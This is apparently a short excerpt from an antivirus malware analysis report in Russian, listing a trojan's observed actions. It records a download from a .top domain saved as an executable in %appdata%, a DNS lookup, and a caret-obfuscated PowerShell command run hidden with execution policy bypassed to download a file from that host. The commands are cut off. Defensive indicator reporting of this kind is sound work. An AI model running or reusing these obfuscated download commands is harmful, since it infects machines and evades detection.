Техническая информация
- http://toagoores.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "Pow^ers^H^E^ll.EX^e ^-^EX^ecuTio^nPolICy ^By^P^as^s^ -^N^oPR^oFI^Le -^wiN^dowsT^yLE^ ^Hi^d^den ^(NeW-ob^j^eC^t^ ^SYs^Tem.^neT.W^eb^CL^IEnT).D^o^wNLoadfIl^E^(^'http://toagoores.t...
- DNS ASK to###ores.top
- '<SYSTEM32>\cmd.exe' /c "Pow^ers^H^E^ll.EX^e ^-^EX^ecuTio^nPolICy ^By^P^as^s^ -^N^oPR^oFI^Le -^wiN^dowsT^yLE^ ^Hi^d^den ^(NeW-ob^j^eC^t^ ^SYs^Tem.^neT.W^eb^CL^IEnT).D^o^wNLoadfIl^E^(^'http://toagoores.t...' (со скрытым окном)